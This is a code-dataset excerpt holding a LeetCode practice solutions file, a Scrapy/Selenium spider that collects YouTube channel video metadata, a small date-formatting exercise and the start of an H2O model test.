{"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "name"}, {"api_name": "optparse.OptionParser", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "410853295", "text": "def f807(grid):\n max_row = [max(row) for row in grid]\n max_col = [max(col) for col in zip(*grid)]\n res =0\n for i, row in enumerate(grid):\n for j, h in enumerate(row):\n res += min(max_row[i], max_col[j]) - h\n return res\n\ngrid = [ [3, 0, 8, 4], \n [2, 4, 5, 7],\n [9, 2, 6, 3],\n [0, 3, 1, 0] ]\n\nprint(f807(grid))\n\n###############################\n#reversed inorder traversal\ndef f1038(root):\n if not root:\n return None\n q, res, presum = [], root, 0\n while q:\n while root:\n q.append(root)\n root = root.right\n node = q.pop()\n presum += node.val\n node.val = presum\n root = node.left\n return res\n\n###############################\n\nimport string\nimport random\nclass f535:\n alphac = string.ascii_letters + string.digits\n \n def __init__(self):\n self.url2code = {}\n self.code2url = {}\n \n def encode(self, longUrl):\n while longUrl not in self.url2code:\n code = ''.join(random.choice(f535.alphac) for _ in range(6))\n if code not in self.code2url:\n self.code2url[code] = longUrl\n self.url2code[longUrl] = code\n return 'http://tinyurl.com/' + self.url2code[longUrl]\n \n def decode(self, shortUrl):\n return self.code2url[shortUrl[-6:]]\n \n\n###############################\n\nclass TreeNode:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\ndef f108(N):\n if not N: \n return None\n l, r = 0, len(N)-1\n if l <= r:\n mid = (l + r) // 2\n\n node = TreeNode(N[mid])\n node.left = f654(N[:mid])\n node.right = f654(N[mid+1:])\n \n return node\n\n\n###############################\n\ndef f654(N):\n if not N: \n return None\n #l, r = 0, len(N)-1\n mid = N.index(max(N))\n\n node = TreeNode(N[mid])\n node.left = f654(N[:mid])\n node.right = f654(N[mid+1:])\n\n return node\n\n###############################\n\ndef f701(root, val):\n if not root:\n return TreeNode(val)\n if val < root.val:\n if not root.elft:\n root.left = TreeNode(val)\n else:\n f701(root.left, val)\n else:\n if not root.right:\n root.right = TreeNode(val)\n else:\n f701(root.right, val)\n return root\n\n###############################\n\nimport itertools\n\ndef f1079(tiles):\n return sum(len(set(itertools.permutations(tiles, i))) for i in range(1, len(tiles)+1))\n\n#OR\n\ndef f1079_2(tiles):\n res = {\"\"}\n for c in tiles:\n res |= {d[:i] + c + d[i:] for d in res for i in range(len(d)+1)}\n return len(res) - 1\n\n\n\n\n###############################\n\ndef f544(N):\n team = list(map(str, range(1, N+1)))\n while N > 1:\n for i in range(N//2):\n team[i] = \"({}, {})\".format(team[i], team.pop())\n N //= 2\n return team[0]\n\n\n###############################\n\nimport bisect\ndef f1008(A):\n def helper(i, j):\n if i == j: return None\n root = TreeNode(A[i])\n mid = bisect.bisect(A, A[i], i+1, j)\n root.left = helper(i+1, mid)\n root.right = helper(mid, j)\n return root\n return helper(0, len(A))\n\ndef f1008_1(A):\n if not A:\n return None\n node = TreeNode(A.pop(0))\n i, n = 0, len(A)\n while i < n and A[i] < node.val:\n i += 1\n node.left = f1008_1(A[:i])\n node.right = f1008_1(A[i:])\n return node\n \n \n\ndef f1008_2(A):\n root = TreeNode(A[0])\n q = [root]\n for v in A[1:]:\n if v < q[-1].val:\n q[-1].left = TreeNode(v)\n q.append(q[-1].left)\n else:\n while q and v > q[-1].val:\n node = q.pop()\n node.right = TreeNode(v)\n q.append(node.right)\n return root\n\n\n###############################\n\nimport collections\ndef f950(deck):\n d = collections.deque()\n for x in sorted(deck)[::-1]:\n d.rotate()\n d.appendleft(x)\n return list(d)\n\ndef f950_2(deck):\n ind = list(range(len(deck)))\n for n in sorted(deck):\n deck[ind[0]] = n\n ind = ind[2:] + [ind[1]] if len(ind) > 1 else []\n return deck\n\n\n###############################\n\ndef f1100(strs, k):\n if len(strs)< k:\n return 0\n res = []\n for i in range(len(strs)-k+1):\n if len(set(strs[i:i+k])) == k:\n res.append(strs[i:i+k])\n return res\n\n###############################\n\ndef f894(N):\n N = N - 1\n if N == 0:\n return [TreeNode(0)]\n res = []\n for i in range(1, min(20, N), 2):\n for left in f894(i):\n for right in f894(N - i):\n root = TreeNode(0)\n root.left = left\n root.right = right\n res += [root]\n return res\n\n\ndef f894_2(N):\n res = {}\n def dfs(A):\n if len(A) == 1: return [TreeNode(0)]\n if str(A) in res: return res[str(A)]\n current = []\n for i in range(len(A)):\n if len(A[:i])%2== 1 and len(A[i+1:])%2 == 1:\n lefty = dfs(A[:i])\n righty = dfs(A[i+1:])\n for l in lefty:\n for r in righty:\n curr = TreeNode(0)\n curr.left = l\n curr.right = r\n current.append(curr)\n res[str(A)] = current\n return current\n return dfs(list(range(N)))\n\n###############################\n\ndef f763(strs):\n start, res = 0, []\n while start < len(strs):\n end = len(strs) - strs[::-1].find(strs[start])\n if end > start:\n end = max(len(strs) - strs[::-1].find(i) for i in set(strs[start:end]))\n res.append(end - start)\n start = end - 1\n start += 1\n return res\n\ndef f763_2(strs):\n d, res, l, r = {}, [], 0, 0\n for i, v in enumerate(strs):\n d[v] = i\n for i in range(len(strs)):\n r = max(r, d[strs[i]])\n if i == r:\n res.append(i-l+1)\n l = i + 1\n return res\n\n \n###############################\n\ndef f814(root):\n if not root:\n return None\n root.left = f814(root.left)\n root.right = f814(root.right)\n if not root.left and not root.right and not root.val: return None\n return root\n\n###############################\n\ndef f890(words, pat):\n res = []\n for w in words:\n if len(w) == len(pat) and [w.find(i) for i in w] == [pat.find(j) for j in pat]:\n res.append(w)\n return res\n\n#OR\n\n#return [w for w in words if [w.index(c) for c in w] == [pat.index(c) for c in pat]]\n\n\n\n###############################\n\n\ndef f797(graph):\n def dfs(cur, path):\n if cur == len(graph) - 1:\n res.append(path)\n else:\n for i in graph[cur]:\n dfs(i, path + [i])\n res = []\n dfs(0, [0])\n return res\n\n\n\n###############################\n\n\ndef f1104(label):\n level, tot = -1, 0\n while label > tot:\n level += 1\n tot += (2 ** level)\n \n level -= 1\n cur = label // 2\n res = [label]\n while level > -1:\n st, end = 2 ** level, (2 **(level+1)) - 1\n cur = st + end - cur\n res.append(cur)\n level -= 1\n cur = cur // 2\n return res[::-1]\n\n###############################\n\ndef f921(S):\n r, l = 0, []\n for s in S:\n if s == \"(\":\n l.append(s)\n elif l: # s == \")\" and l\n l.pop()\n else:\n r += 1\n return r + len(l)\n\n###############################\n\ndef f861(A):\n for i in range(len(A)):\n if A[i][0] == 0:\n for j in range(len(A[0])):\n A[i][j] = 1 - A[i][j] #flip all the rows, that has a 0 in the front.\n \n base = 1\n sumtotal = 0\n for j in range(len(A[0])-1, -1, -1):\n sumcol = sum([A[i][j] for j in range(len(A))])\n sumtotal += base * max(sumcol, len(A) - sumcol)\n base = base * 2\n \n return sumtotal\n \n\n###############################\n\ndef f979(self, root):\n self.res = 0\n def dfs(node):\n if not node: return 0\n left = dfs(root.left)\n right = dfs(root.right)\n self.res += abs(left) + abs(right)\n return node.val + left + right - 1\n dfs(root)\n return self.res\n\ndef f979_2(root):\n def dfs(node):\n if not node: return 0, 9\n (lbal, lcnt), (rbal, rcnt) = dfs(node.left), dfs(node.right) \n #(value, accumulated moves)\n bal = node.val + lbal + rbal - 1\n return bal, lcnt + rcnt + abs(bal)\n return dfs(root)[1]\n\n \n \n###############################\n\ndef f968(root):\n if not root.left and not root.right:\n return 1\n res = []\n d = {root: None}\n q = collections.deque([root])\n while q:\n node = q.popleft()\n if node.left:\n d[node.left] = node\n q.append(node.left)\n if node.right:\n d[node.right] = node\n q.append(node.right)\n res.append(node)\n \n dp = {}\n for i in range(len(res) -1, -1, -1):\n parent = d[res[i]]\n if res[i] in dp or res[i].left in dp or res[i].right in dp:\n continue\n dp[parent] = 1\n return sum(dp.values())\n\n###############################\n\ndef f517(machines):\n total, n = sum(machines), len(machines)\n if total % n: return -1\n target, res, toRight = total/n, 0, 0 \n #toRight means the clothes that we need to pass to the right number.\n for m in machines:\n toRight = m + toRight - target\n res = max(res, abs(toRight), m - target)\n return res\n\n\ndef f517_2(machines):\n total, n = sum(machines), len(machines)\n if total % n: return -1\n target, ans, send_out = total/n, 0, [0]*n \n for i in range(n-1):\n if machines[i] > target:\n send_out[i] += machines[i] - target\n elif machines[i] < target:\n send_out[i+1] = target - machines[i]\n machines[i+1] += machines[i] - target\n ans = max(ans, send_out[i], send_out[i+1])\n return ans\n\n###############################\n\n###############################\n\n\ndef f366(root):\n def dfs(node):\n if not node:\n return -1\n i = 1 + max(dfs(node.left), dfs(node.right)) #i is the level from leaves\n if i == len(res):\n res.append([])\n res[i].append(node.val)\n return i\n res = []\n dfs(root)\n return res\n\n###############################\n\ndef f419(board):\n if len(board) == 0: return 0\n m, n = len(board), len(board[0])\n cnt = 0\n for i in range(m):\n for j in range(n):\n if board[i][j] == 'X' and \\\n (i == 0 or board[i-1][j] == '.') and \\\n (j == 0 or board[i][j-1] == '.'):\n cnt += 1\n return cnt\n\n###############################\n\ndef f537(a, b):\n a1, a2 = map(int, a[:-1].split('+'))\n b1, b2 = map(int, b[:-1].split('+'))\n return '%d+d%i' %(a1*b1 - a2*b2, a1*b2 + a2*b1)\n\n###############################\n\ndef f338(N):\n res = []\n for n in range(N+1):\n cnt = 0\n while n:\n if n%2: cnt += 1\n n //= 2\n res.append(cnt)\n return res\n\n#OR\n for n in range(N+1):\n res += bin(n).count('1')\n return res\n\n#OR\n res = [0]\n while len(res) < N+1:\n res += [ i + 1 for i in res]\n return res[:N+1]\n\n###############################\n\ndef f54(M):\n if not M: return []\n l, r, u, d, res = 0, len(M[0])-1, 0, len(M)-1, []\n while l<=r and u <=d:\n res.extend(M[u][l:r+1]) #left to right\n u += 1\n for i in range(u, d+1):\n res.append(M[i][r]) #up to down\n r -= 1\n if u <= d:\n res.extend(M[d][l:r+1][::-1]) #right to left\n d -= 1\n if l <= r:\n for i in range(d, u-1, -1):\n res.append(M[i][l]) #down to up\n l += 1\n return res\n\ndef f54_2(M):\n return M and [*M.pop(0)] + f54_2([*zip(*M)][::-1])\n\n###############################\n \ndef f59(N):\n A, low = [], N*N+1\n while low > 1:\n low, high = low - len(A), low\n A = [range(low, high)] + zip(*A[::-1])\n return A\n\n\ndef f59_2(N):\n if not N:\n return []\n res = [[0]*N]*N\n l, r, u, d, n = 0, N-1, 0, N-1, 1\n while l <= r and u <= d:\n for i in range(l, r+1):\n res[u][i] = n\n n += 1\n u += 1\n \n for i in range(u, d+1):\n res[i][r] = n\n n += 1\n r -= 1\n \n for i in range(r, l-1, -1):\n res[d][i] = n\n n += 1\n d -= 1\n \n for i in range(d, u-1, -1):\n res[i][l] = n\n n += 1\n l += 1\n \n return res\n \n###############################\n\ndef f885(R, C, r0, c0):\n res, n, k = [[r0, c0]], R*C, 1\n direct, ind = [(-1, 0), (0, 1), (1, 0), (0, -1)], 1\n while len(res) < n:\n for _ in range(2):\n for _ in range(k):\n r0 += direct[ind][0]\n c0 += direct[ind][1]\n if 0<=r0= 0:\n res[i] = res[ind] = 1\n \n#( is 1 point, ) is -1 point.We try to keep total points of two groups even, by distributing parentheses alternatively.\ndef f1111_2(self, seq):\n A = B = 0\n res = [0] * len(seq)\n for i, c in enumerate(seq):\n v = 1 if c == '(' else -1\n if (v > 0) == (A < B):\n A += v\n else:\n B += v\n res[i] = 1\n return res\n\n###############################\n\ndef f1123(root):\n def helper(node):\n if not node:\n return 0, None\n h1, lca1 = helper(node.left)\n h2, lca2 = helper(node.right)\n if h1 > h2:\n return h1 + 1, lca1\n if h1 < h2:\n return h2 + 1, lca2\n return h1 + 1, root\n return helper(root)[1]\n\n###############################\n\ndef f723(board):\n R, C = len(board), len(board[0])\n changed = True\n \n while changed:\n changed = False\n for r in range(R):\n for c in range(C-2):\n if abs(board[r][c]) == abs(board[r][c+1]) == abs(board[r][c+2]) != 0:\n board[r][c] = board[r][c+1] = board[r][c+2] = 0\n change = True\n \n for r in range(R-2):\n for c in range(C):\n if abs(board[r][c]) == abs(board[r+1][c]) == abs(board[r+2][c]) != 0:\n board[r][c] = board[r+1][c] = board[r+2][c] = 0\n change = True\n\n\n for c in range(C):\n i = R - 1\n for r in range(R-1, -1, -1): #reversed(range(R))\n if board[r][c]>0:\n board[i][c] = board[r][c]\n i -= 1\n for r in reversed(range(i+1)):\n board[r][c] = 0\n \n return board\n\n###############################\n\ndef f986(a, b):\n i, j, res = 0, 0, []\n while i < len(a) and j < len(b):\n if a[i][1] < b[j][0]:\n i += 1\n elif b[j][1] < a[i][0]:\n j += 1\n else:\n res.append([max(a[i][0], b[j][0]), min(a[i][1], b[j][1])])\n if a[i][1] > b[j][1]:\n j += 1\n else:\n i += 1\n return res\n\ndef f986_2(a, b):\n c = sorted(a+b, key=lambda x: x[0])\n res = []\n for i in range(1, len(c)):\n if c[i-1][1] < c[i][0]:\n continue\n else:\n res.append([c[i][0], min(c[i-1][1], c[i][1])])\n \n return res\n\n###############################\n\ndef f912_quicksort(N):\n if len(N) < 2:\n return N\n pivot = random.choice(N)\n lt = [v for v in N if v < pivot]\n eq = [v for v in N if v == pivot]\n gt = [v for v in N if v > pivot]\n \n return f912_quicksort(lt) + eq + f912_quicksort(gt)\n\ndef f912_insertsort(N):\n for i in range(1, len(N)):\n key = N[i]\n j = i - 1\n while j >= 0 and key < N[j]:\n N[j+1] = N[j]\n j -= 1\n N[j+1] = key\n return N\n\n\ndef f913_mergesort(N):\n def merge(A, B):\n c = []\n while A and B:\n c.append(A.pop(0)) if A[0] < B[0] else c.append(B.pop(0))\n return c + (A or B)\n \n n = len(N)\n return N if n < 2 else merge(f913_mergesort(N[:n//2]), f913_mergesort(N[n//2:]))\n\n\n###############################\n\nimport functools\n\ndef f1101(self,logs):\n \n def findp(res,a,b):\n for i in range(len(res)):\n if a in res[i] or b in res[i]:\n res[i].add(a)\n res[i].add(b)\n break\n else:\n res.append({a,b})\n #print(res)\n #check if there is a common person across all groups\n #if there is, this is the first time all people got connected\n return functools.reduce(lambda a,b:a&b, res)\n \n logs = sorted(logs,key=lambda x: x[0]) #sort by timestamp\n \n res=[{logs[0][1],logs[0][2]}]\n for k in range(1, len(logs)):\n if findp(res,logs[k][1],logs[k][2]):\n return logs[k][0]\n return -1\n\n\n\np = {} # p is the parent dict\ndef find(x):\n while p[x] != x:\n p[x] = p[p[x]]\n x = p[x]\n return p[x]\ndef union(x, y):\n p[x] = p.setdefault(x, x)\n p[y] = p.setdefault(y, y)\n print(p, find(x), find(y))\n p[find(x)] = find(y)\n\nunion((0,1,2,3),(3,4,5))\nprint(p)\n\n#{(0, 1, 2, 3): (0, 1, 2, 3), (3, 4, 5): (3, 4, 5)} (0, 1, 2, 3) (3, 4, 5)\n#{(0, 1, 2, 3): (3, 4, 5), (3, 4, 5): (3, 4, 5)}\n###############################\n\ndef f791(S, T):\n return ''.join(sorted(T, key=lambda x: S.find(x)))\n\n###############################\n\ndef f1110(root, to_delete):\n to_del = set(to_delete)\n res = []\n def helper(root, is_root):\n if not root:\n return None\n root_deleted = root.val in to_del\n if is_root and not root_deleted:\n res.append(root)\n root.left = helper(root.left, root_deleted)\n root.right = helper(root.right,root_deleted)\n return None if root_deleted else root\n \n helper(root, True)\n return res\n\n###############################\n\ndef f959(self, grid):\n f = {}\n def find(x):\n f.setdefault(x, x)\n if x != f[x]:\n f[x] = find(f[x])\n return f[x]\n def union(x, y):\n f[find(x)] = find(y)\n\n for i in range(len(grid)):\n for j in range(len(grid)):\n if i: # i > 0 union to the top area\n union((i - 1, j, 2), (i, j, 0))\n if j: # j > 0 union to the left area\n union((i, j - 1, 1), (i, j, 3))\n if grid[i][j] != \"/\":\n union((i, j, 0), (i, j, 1))\n union((i, j, 2), (i, j, 3))\n if grid[i][j] != \"\\\\\":\n union((i, j, 3), (i, j, 0))\n union((i, j, 1), (i, j, 2))\n return len(set(map(find, f)))\n\n\n###############################\n\n\n#To get dp[i], we will try to change k last numbers separately to the maximum of them,\n\ndef f1043(A, K):\n n = len(A)\n dp = [0] * n\n curMax = 0\n for i in range(n):\n if i < K: \n curMax = max(curMax, A[i])\n dp[i] = curMax * (i + 1)\n else:\n curMax = 0\n for j in range(1, K + 1):\n curMax = max(A[i - j + 1], curMax)\n dp[i] = max(dp[i], dp[i - j] + curMax * j)\n return dp[n - 1]\n\n\n\ndef f1043_2(A, K):\n N = len(A)\n dp = [0] * (N + 1)\n for i in range(N):\n curMax = 0\n for k in range(1, min(K, i + 1) + 1):\n curMax = max(curMax, A[i - k + 1])\n dp[i] = max(dp[i], dp[i - k] + curMax * k)\n return dp[N - 1]\n\n###############################\n\ndef f969(A):\n res = []\n for x in range(len(A), 1, -1):\n i = A.index(x)\n res.extend([i+1, x])\n A = A[:i:-1] + A[:i]\n return res\n\n###############################\n\n\ndef f1061(A, B, S):\n f = {}\n def find(x):\n f.setdefault(x, x)\n if x != f[x]:\n f[x] = find(f[x])\n return f[x]\n def union(x, y):\n if find(x) < find(y):\n f[find(y)] = find(x)\n else:\n f[find(x)] = find(y)\n #########\n p = dict()\n def find1(c):\n p.setdefault(c,c)\n if c!=p[c]:\n p[c]=find(p[c])\n return p[c]\n\n def union1(a,b):\n c1,c2=find(a),find(b)\n if(c1=j: return 0\n if j==i+1 and j < len(piles): return piles[i]\n if (i,j) in cache: return cache[i,j]\n res = max(piles[i]+min(firstscore(i+2,j), firstscore(i+1,j-1)) , piles[j-1] + min(firstscore(i+1,j-1), firstscore(i,j-2)))\n cache[i,j] = res\n return res\n\n Alex = firstscore(0,len(piles))\n Lee = sum(piles) - Alex\n return Alex > Lee\n\n\n###############################\n\ndef f107(root):\n res = []\n if not root:\n return res\n q = collections.deque([root])\n while q:\n rec = []\n for i in range(len(q)):\n node = q.popleft()\n rec.append(node.val)\n if node.left: q.append(node.left)\n if node.right: q.append(node.right)\n res.append(rec)\n return res[::-1]\n\n###############################\n\n###############################\n \ndef f103(root):\n res = []\n if not root:\n return res\n q=collections.deque([root])\n level = 1\n while q:\n rec = []\n for i in range(len(q)):\n node = q.popleft()\n rec.append(node.val)\n if node.left: q.append(node.left)\n if node.right: q.append(node.right)\n if level%2: res.append(rec)\n else: res.append(rec[::-1])\n level += 1\n \n return res\n\n###############################\n\ndef f542(M):\n m, n = len(M), len(M[0])\n q = collections.deque([])\n visited = set()\n for i in range(m):\n for j in range(n):\n if M[i][j] == 0:\n q.append((i, j))\n visited.add((i, j))\n while q:\n i, j = q.popleft()\n for x, y in [(i+1,j),(i-1,j),(i,j-1),(i,j+1)]:\n if 0<=x= K and A[i-K] == 2: #when window moves forward, reduce its cur by minus those flips falling out behind the window\n cur -= 1\n if (cur % 2) == A[i]: # cur is even and A[i] == 0 or cur is odd and A[i] == 1\n if i + K > len(A):\n return -1\n A[i] = 2\n cur, res = cur + 1, res + 1\n return res\n\n\n###############################\n\ndef f1001(N, lamps, queries):\n lampon = set()\n rowon = colon = diagTL = diagBL = dict()\n for r, c in lamps:\n lampon.add((r,c))\n rowon[r] += 1\n colon[c] += 1\n diagTL[c-r] += 1\n diagBL[c+r-N] += 1\n res = []\n for r, c in queries:\n if rowon[r] > 0 or colon[c] > 0 or diagTL[c-r] > 0 or diagBL[c+r-N] >0:\n res.append(1)\n else:\n res.append(0)\n for dx in [-1,0,1]:\n for dy in [-1,0,1]:\n x, y = r+dx, c+dy\n if (x, y) in lampon:\n rowon[r] -= 1\n colon[c] -= 1\n diagTL[c-r] -= 1\n diagBL[c+r-N] -= 1\n lampon.remove((r,c))\n return res\n\n###############################\n\ndef ff654(nums):\n if not nums:\n return None\n i = nums.index(max(nums))\n node = TreeNode(nums[i])\n node.left = ff654(nums[:i])\n node.right = ff654(nums[i+1:])\n \n return node\n \n###############################\n \ndef f998(root, val):\n if not root: return TreeNode(val)\n if val > root.val:\n node = TreeNode(val)\n node.left = root\n return node\n else:\n root.right = f998(root.right, val)\n return root\n \ndef f998_2(root, val):\n pre, cur = None, root\n while cur and cur.val > val:\n pre, cur = cur, cur.right\n node = TreeNode(val)\n node.left = cur\n if pre: pre.right = node\n return root if root.val > val else node\n \n###############################\n\ndef f999(board):\n rook, m, n = [], len(board), len(board[0])\n for i in range(m):\n for j in range(n):\n if board[m][n] == 'R':\n rook.append([i, j])\n i, j = m, n\n \n res = 0\n x0, y0 = rook.pop()\n for i, j in [[0,-1],[-1,0],[0,1],[1,0]]:\n x, y = i + x0, j + y0\n while 0 <= x < m and 0 <= y < n:\n if board[x][y] == 'p': res += 1\n if board[x][y] != '.': break\n x, y = x + i, y + j\n return \n\n###############################\n\n\ndef f997(N, trust):\n dic, map = collections.defaultdict(list), set()\n for i, j in trust:\n if not dic[i]:\n dic[i].append(j)\n map.add(j)\n return map - dic.keys() + 1\n \ndef f997_2(N, trust):\n count = [0] * (N + 1)\n for i, j in trust:\n count[i] -= 1\n count[j] += 1\n for i in range(1, N + 1):\n if count[i] == N - 1:\n return i\n return -1\n\n\n###############################\n\ndef f992(A, K):\n def helper(A, K):\n i, res = 0, 0\n d = collections.Counter()\n for j in range(len(A)):\n d[A[j]] += 1\n if d[A[j]] == 1: \n K -= 1\n \n while K < 0: #while there are more than K distinct char \n d[A[i]] -= 1\n if d[A[i]] == 0:\n K += 1\n i += 1 #remove the char from the left side\n res += j - i + 1 #get the window sides == the number of new substring\n return res\n return helper(A, K) - helper(A, K-1)\n \ndef f992_2(A, K):\n def atMostK(A, K):\n count = collections.Counter()\n res = i = 0\n for j in range(len(A)):\n if count[A[j]] == 0: K -= 1\n count[A[j]] += 1\n while K < 0:\n count[A[i]] -= 1\n if count[A[i]] == 0: K += 1\n i += 1\n res += j - i + 1\n return res\n return atMostK(A, K) - atMostK(A, K - 1)\n \n\n###############################\n\ndef f991(X, Y):\n if X >= Y:\n return X - Y\n res = 0\n while X < Y:\n if Y % 2 == 1:\n Y += 1\n res += 1\n Y //= 2\n res += 1\n return res + X - Y\n\n#The difference between DP and greedy is: Greedy algo requires that the result of the whole question is \n# determined by the result of sub-question. For this question, \n# we can prove that f(X, Y) = f(X, Y/2) + 1, if Y is even or f(X, Y + 1) + 1 if Y is odd. \n# Therefore, it could be solved simply by greedy algorithm. \n# If you consider it as a dp problem, the formula should be f(X, Y) = min(f(2X, Y), f(X-1, Y)) + 1. \n# If you want to calculate f(X, Y), you need to calculate f(2X, Y) and f(X-1, Y).\n\n\n\n###############################\n\n\n\n", "repo_name": "frankwirgit/leet_code", "sub_path": "leet_m_level.py", "file_name": "leet_m_level.py", "file_ext": "py", "file_size_in_byte": 33259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "string.ascii_letters", "line_number": 38, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 38, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 46, "usage_type": "call"}, {"api_name": "itertools.permutations", "line_number": 114, "usage_type": "call"}, {"api_name": "bisect.bisect", "line_number": 145, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 183, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 393, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 700, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 746, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 934, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 953, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 972, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 992, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 1013, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 1041, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 1047, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 1065, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 1071, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 1081, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 1087, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 1142, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 1162, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 1270, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 1293, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 1310, "usage_type": "call"}]} +{"seq_id": "4075738888", "text": "import scrapy\nimport random\nimport time\nfrom scrapy_selenium import SeleniumRequest\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass YtchannelSpider(scrapy.Spider):\n name = \"ytChannel\"\n allowed_domains = [\"www.youtube.com\"]\n # start_urls = [\"https://www.youtube.com/\"]\n\n def start_requests(self):\n urls = [\"https://www.youtube.com/channel/UCmreSJkj5C2L3BpJsZ7ikvQ/videos\",\n \"https://www.youtube.com/c/SellyTwitch/videos\",\n \"https://www.youtube.com/channel/UCVUmDq4aZ8_gzfCGiRO9KgA/videos\",\n \"https://www.youtube.com/channel/UCPwDQ6L9s6r1LDS753kpCHQ\"\n ]\n\n for url in urls:\n yield SeleniumRequest(url=url, callback=self.parse, wait_time=random.uniform(5, 10), wait_until=EC.presence_of_element_located((By.ID, \"page-manager\")))\n # yield SeleniumRequest(url=\"https://www.youtube.com/channel/UCVUmDq4aZ8_gzfCGiRO9KgA/videos\", callback=self.parse, wait_time=random.uniform(5, 10), wait_until=EC.presence_of_element_located((By.ID, \"page-manager\")))\n\n def parse(self, response):\n videosTitle = response.css(\n \"h3.ytd-grid-video-renderer a::text\").get()\n videosLink = response.css(\n \"h3.ytd-grid-video-renderer a.ytd-grid-video-renderer::attr(href)\").get()\n videosImage = response.css(\n \"ytd-thumbnail.ytd-grid-video-renderer yt-img-shadow.ytd-thumbnail img::attr(src)\").get()\n videosStatus = response.css(\n \"ytd-thumbnail-overlay-time-status-renderer.ytd-thumbnail::attr(overlay-style)\").get()\n videosChannelName = response.css(\n \"yt-formatted-string.ytd-channel-name::text\").get()\n metaData = response.css(\n \"div.ytd-grid-video-renderer span.ytd-grid-video-renderer::text\").getall()\n\n videoLinkParse = str(videosLink).split(\"=\", 1)\n videosID = videoLinkParse[1]\n\n videosViews = None\n videosUploadedTime = None\n\n for i in range(len(metaData)):\n if i < 1:\n videosViews = metaData[i]\n videosUploadedTime = metaData[i+1]\n videoItem = {\n \"videoID\": videosID,\n \"videoTitle\": videosTitle,\n \"videoLink\": f\"https://www.youtube.com{videosLink}\",\n \"videoImage\": videosImage,\n \"videoStatus\": videosStatus,\n \"videoViews\": videosViews,\n \"videoChannelName\": videosChannelName,\n \"videoUploadedTime\": videosUploadedTime\n }\n\n yield videoItem\n", "repo_name": "Weitingchien/Scrapy", "sub_path": "collector/collector/spiders/ytChannel.py", "file_name": "ytChannel.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 10, "usage_type": "attribute"}, {"api_name": "scrapy_selenium.SeleniumRequest", "line_number": 23, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "29088921902", "text": "from datetime import datetime, timedelta\n\ndef compute_prev_date(dates_list:list):\n \"\"\"\n This method takes in a list of dates \n and returns a list with the corresponding \n previous days of the dates in the input list.\n The output list has a different format from \n the input list. \n \"\"\"\n #Converts the list of string into datetime\n fomat_list = [datetime.strptime(d,'%Y-%m-%d') for d in dates_list ]\n\n #computes the previous date of the dates contained in the dates list\n previous_list = [datetime.date(d) - timedelta(1) for d in fomat_list ]\n\n #returns the previous day list in the specified format\n print( [datetime.strftime(d,'%d %b %Y') for d in previous_list])\n\n#prints the dates previous day in the specified format\ndate_list = ['1999-01-21', '2022-12-30', '2099-09-17']\ncompute_prev_date(date_list)", "repo_name": "sphezulu/Platnum_Life_Software_Developer_Internship--initial-upload", "sub_path": "Round1/question3_list_comprehension.pyt", "file_name": "question3_list_comprehension.pyt", "file_ext": "pyt", "file_size_in_byte": 843, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "13350665274", "text": "\nimport h2o\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\n\nfrom tests import pyunit_utils\n\n\ndef pubdev_5023_rm_metalearner():\n # Import a sample binary outcome dataset into H2O\n data = h2o.import_file(pyunit_utils.locate(\"smalldata/higgs/higgs_train_10k.csv\"))\n\n # Identify predictors and response\n x = data.columns\n y = \"response\"\n x.remove(y)\n\n # For binary classification, response should be a factor\n data[y] = data[y].asfactor()\n gbm_h2o = H2OGradientBoostingEstimator(learn_rate=0.1, max_depth=4)\n gbm_h2o.train(x=x, y=y, training_frame=data)\n\n 